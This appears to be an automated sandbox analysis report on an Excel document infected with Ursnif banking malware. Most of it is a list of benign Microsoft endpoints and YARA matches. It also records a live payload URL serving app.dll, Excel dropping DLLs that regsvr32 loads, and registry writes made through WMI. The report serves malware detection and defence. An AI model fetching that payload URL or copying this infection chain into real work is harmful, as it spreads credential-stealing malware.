Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://config.edge.skype.com
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://cortana.ai
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://cortana.ai/api
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://cr.office.com
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://dataservice.o365filtering.com
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://dataservice.o365filtering.com/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://dev.cortana.ai
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://devnull.onenote.com
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://directory.services.
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://enrichment.osi.office.net/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: close.xml String found in binary or memory: https://free.mynowministries.com/app.dll
Source: powershell.exe, 00000025.00000002.594457896.000002865866F000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://graph.ppe.windows.net
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://graph.ppe.windows.net/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://graph.windows.net
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://graph.windows.net/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&amp;premium=1
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://incidents.diagnostics.office.com
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://lifecycle.office.com
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://login.microsoftonline.com/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://login.windows.local
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://management.azure.com
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://management.azure.com/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://messaging.office.com/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://ncus.contentsync.
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://ncus.pagecontentsync.
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://officeapps.live.com
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://onedrive.live.com
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://onedrive.live.com/embed?
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://osi.office.net
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://outlook.office.com/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://outlook.office365.com/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://pages.store.office.com/review/query
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://powerlift.acompli.net
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://settings.outlook.com
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://shell.suite.office.com:1443
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://skyapi.live.net/Activity/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://staging.cortana.ai
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://store.office.cn/addinstemplate
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://store.office.com/addinstemplate
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://store.office.de/addinstemplate
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://tasks.office.com
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://templatelogging.office.com/client/log
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://web.microsoftstream.com/video/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://webshell.suite.office.com
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://wus2.contentsync.
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://wus2.pagecontentsync.
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: https://www.odwebp.svc.ms
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown HTTPS traffic detected: 162.241.253.78:443 -> 192.168.2.3:49725 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected Ursnif
Source: Yara match File source: 19.3.regsvr32.exe.56b94a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.regsvr32.exe.4d894a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000003.508793933.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.508759247.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.508819476.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411957077.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.508778168.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411794580.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411858229.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411885260.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.472132410.0000000004B0E000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.531333562.000000000553C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.508710785.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411972809.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.429184025.0000000004C0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.428651984.0000000004D89000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.520271501.00000000056B9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.508809489.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411764136.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411824879.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.508736134.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.508679200.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411905435.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 5236, type: MEMORY

E-Banking Fraud:

barindex
Yara detected Ursnif
Source: Yara match File source: 19.3.regsvr32.exe.56b94a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.regsvr32.exe.4d894a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000003.508793933.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.508759247.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.508819476.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411957077.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.508778168.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411794580.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411858229.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411885260.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.472132410.0000000004B0E000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.531333562.000000000553C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.508710785.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411972809.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.429184025.0000000004C0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.428651984.0000000004D89000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.520271501.00000000056B9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.508809489.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411764136.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411824879.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.508736134.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.508679200.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411905435.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 5236, type: MEMORY
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_001E39C5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 3_2_001E39C5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 19_2_00FB39C5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 19_2_00FB39C5

System Summary:

barindex
Office process drops PE file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\app[1].dll Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\Public\Documents\decrypt.dll Jump to dropped file
Writes or reads registry keys via WMI
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\regsvr32.exe Process Stats: CPU usage > 98%
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_001E2D06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 3_2_001E2D06
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_001E8005 NtQueryVirtualMemory, 3_2_001E8005
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 19_2_00FB2D06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 19_2_00FB2D06
